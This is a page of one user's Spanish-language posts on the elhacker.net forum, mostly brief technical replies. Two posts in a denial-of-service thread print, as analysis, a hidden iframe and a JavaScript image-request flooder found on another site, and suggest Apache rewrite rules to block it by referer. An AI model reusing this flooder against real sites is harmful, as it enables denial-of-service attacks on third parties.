elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


Tema destacado: Recuerda que debes registrarte en el foro para poder participar (preguntar y responder)


  Mostrar Mensajes
Páginas: 1 ... 441 442 443 444 445 446 447 448 449 450 451 452 453 454 455 [456] 457 458 459 460 461 462 463 464 465 466 467 468 469 470 471 ... 769
4551  Foros Generales / Noticias / Re: Un hacker descifra los códigos que aparecen en los ordenadores de “Iron Man”,... en: 15 Enero 2014, 01:10 am
See.. pero si no, no despiertan el interes de los lectores.. los que quieran el tumblr:
http://moviecode.tumblr.com


PD: Esa imagen es de Super Man 2 tal y como se menciona en la fuente
http://www.wired.com/underwire/2014/01/movie-fake-code

Saludos
4552  Foros Generales / Foro Libre / Re: Busco gente interesada en buscar información en: 15 Enero 2014, 01:05 am
Citar
si la armas, y la armas bien, e incluso incluyes tus propias teorias locas... puedes hacer un buen flujo de conspiranoicos a tu pagina, con publicidad daria buenos dividendos ;)

Me recuerda a mundodesconocido xDDD

Saludos
4553  Programación / Desarrollo Web / Re: [Consulta]google hangouts en wordpress phpBB smf es posible en: 14 Enero 2014, 23:59 pm
Es posible. le doy 3/10 para wordpress.. smf es que da pereza siquiera desarrollar para el.. es tan.. anti-social que da cosa tocarlo ·_·

https://developers.google.com/+/hangouts/writing

Saludos
4554  Programación / Desarrollo Web / Re: No consigo alinear y centrar bien los divs! en: 14 Enero 2014, 23:53 pm
Muestra codigo.

Saludos
4555  Seguridad Informática / Seguridad / Re: Ataques de Denegación en: 14 Enero 2014, 22:34 pm
Citar
Gracias por vuestras respuestas pero entro a su web y no encuentro la línea de código de @Drvy podéis decirme donde se encuentra?
Cita de: @drvy en 13 Enero 2014, 09:18 am
Código
  1. view-source:http://boombang.me/esp/cliente.php
Linea 76 para ser mas específicos.
Citar
Como hago para denegarlo, por favor ayudame
Cita de: @drvy en 13 Enero 2014, 09:18 am
no he probado pero puedes hacer que Apache niegue o redireccione a todo el que tenga de referer esa pagina (boombang.me). También puedes agregar una excepción que niegue o redireccione si la url contiene msg=robandocreditos (un mensaje gracioso que deja el atacante xD).
Citar
Esto sirve: http://foro.elhacker.net/php/anti_dos_ddos_en_php-t399902.0.html    ??

Eso es una protección muy primitiva que solo sirve para hostings que no disponen de otros recursos (htaccess, firewall etc..). Vamos, en tu caso podria funcionar, pero hay métodos mas "bonitos" de hacerlo y no llegar a usar PHP (ya que esa es la ultima linea de defensa de tu host).

Como he dicho, lo que hace ese script es crear mil requests en forma de imagenes a tu server.. lo que puedes hacer es detectar el referer y en caso de que provenga de el, negarlo o redireccionarlo.

Ejemplo.
Código
  1. <IfModule mod_rewrite.c>
  2. RewriteEngine On
  3. RewriteBase /
  4. RewriteCond %1%{HTTP_REFERER} boombang\.me/(.*)?
  5. RewriteRule ^.*$ http://boombang.me/%1 [R=301,L]
  6. </IfModule>

Esto hara que si el referer viene de boombang.me/cualquiercosa lo redireccione permanentemente a su propia url ·_·.. En teoría se estaría haciendo DDOS a si mismo xD
Citar
Parece que el ataque se esta realizando únicamente desde un servidor. Si tienes acceso a apache deniega la ip del origen de ataque con deny from y adios  ::)

El realidad el ataque proviene de los visitantes de ese servidor.. no del propio servidor. Entonces eso no serviría de nada.

Saludos
4556  Sistemas Operativos / GNU/Linux / Re: ¿Consulta que sistema de linux es el mas estable y agarre jdownloader 2? en: 13 Enero 2014, 22:46 pm
El problema dato000 es que la licencia de Java entra en conflicto directo con las distros libres de GNU/Linux... por muy gratuita que sea, no es libre.. y el quiere correr jdownloader en esas distros..

No se pa que hacer el esfuerzo de usar una distro totalmente libre para instalar software privativo ·_·

Saludos
4557  Seguridad Informática / Seguridad / Re: Ataques de Denegación en: 13 Enero 2014, 09:18 am
Efectivamente esa pagina esta llevando acabo un DDOS.
Código
  1. view-source:http://boombang.me/esp/cliente.php
Código
  1. <iframe src='ddosputo.php' height='0' width='0' style="borders: none; display: none"></iframe>

La cual tiene:

Código
  1. <meta http-equiv="refresh" content="60;URL=ddosputo.php">
Código
  1. <script type="text/javascript">
  2. 			function random() {
  3. 				var count = 0;
  4. 				var result = "";
  5. 				var length = Math.Floor(Math.Random() * 100);
  6. 				var chars = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXTZabcdefghiklmnopqrstuvwxyz";
  7.  
  8. 				for (var i = 0; i < length; i++) {
  9. 					var num = Math.Floor(Math.Random() * chars.length);
  10. 					result = result + chars.substring(num, num + 1);
  11. 				}
  12.  
  13. 				return result;
  14. 			}
  15.  
  16. 			(function () { 
  17. 				var fireInterval; 
  18. 				var requestsHT = {};
  19. 				var isFiring = true;
  20. 				var targetURL = "http://boomkong.tk"
  21. 				var requestedCtr = 0, succeededCtr = 0, failedCtr = 0;
  22.  
  23. 				var makeHttpRequest = function () {
  24.  
  25. 				if (requestedCtr > failedCtr + succeededCtr + 1000) {  return; };
  26.  
  27. 				var rID = Number(new Date()); var img = new Image();
  28. 				img.onerror = function () { onFail(rID); };
  29. 				img.onabort = function () { onFail(rID); };
  30. 				img.onload = function () { onSuccess(rID); };
  31.  
  32. 				img.setAttribute("src", targetURL + "?id=" + rID + "&msg=robandocreditosokase-lol");
  33. 				requestsHT[rID] = img;  onRequest(rID);
  34. 				};
  35.  
  36. 				var onRequest = function (rID) { requestedCtr++; };
  37. 				var onComplete = function (rID) { delete requestsHT[rID]; };
  38. 				var onFail = function (rID) { succeededCtr++; delete requestsHT[rID]; };
  39. 				var onSuccess = function (rID) { succeededCtr++; delete requestsHT[rID]; };
  40.  
  41. 				isFiring = true; 
  42. 				fireInterval = setInterval(makeHttpRequest, (1000 / parseInt(200) | 0));
  43. 			})();
  44. 		</script>

Pero no parece que estén atacando a tu foro.. o al menos no en este momento.


Defenderte de ese ataque.. no he probado pero puedes hacer que Apache niegue o redireccione a todo el que tenga de referer esa pagina (boombang.me). También puedes agregar una excepción que niegue o redireccione si la url contiene msg=robandocreditos (un mensaje gracioso que deja el atacante xD).

Al fin y al cabo lo que hacen es crear imágenes (miles xD) con ruta el sitio al que atacan.

Slaudos
4558  Sistemas Operativos / GNU/Linux / Re: ¿Consulta que sistema de linux es el mas estable y agarre jdownloader 2? en: 13 Enero 2014, 03:54 am
gNewSense igual funciona porque incluye varios interpretes java (jdownloader es java) libres.. pero igual no. Es que entras en un conflicto bastante gordo.

Esas distros estan libres de cualquier software/firmware privativo. Java es privativo.

Saludos
4559  Seguridad Informática / Seguridad / Re: Rootkit en mi pc. ¿Que hago? en: 12 Enero 2014, 21:33 pm
Malwarebytes tienen un anti-rootkit en fase beta.
http://www.malwarebytes.org/antirootkit/

Saludos
4560  Programación / PHP / Re: validar una fecha que no se pase del dia actual en: 12 Enero 2014, 20:57 pm
¿Que tienes hecho?

Saludos
Páginas: 1 ... 441 442 443 444 445 446 447 448 449 450 451 452 453 454 455 [456] 457 458 459 460 461 462 463 464 465 466 467 468 469 470 471 ... 769
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines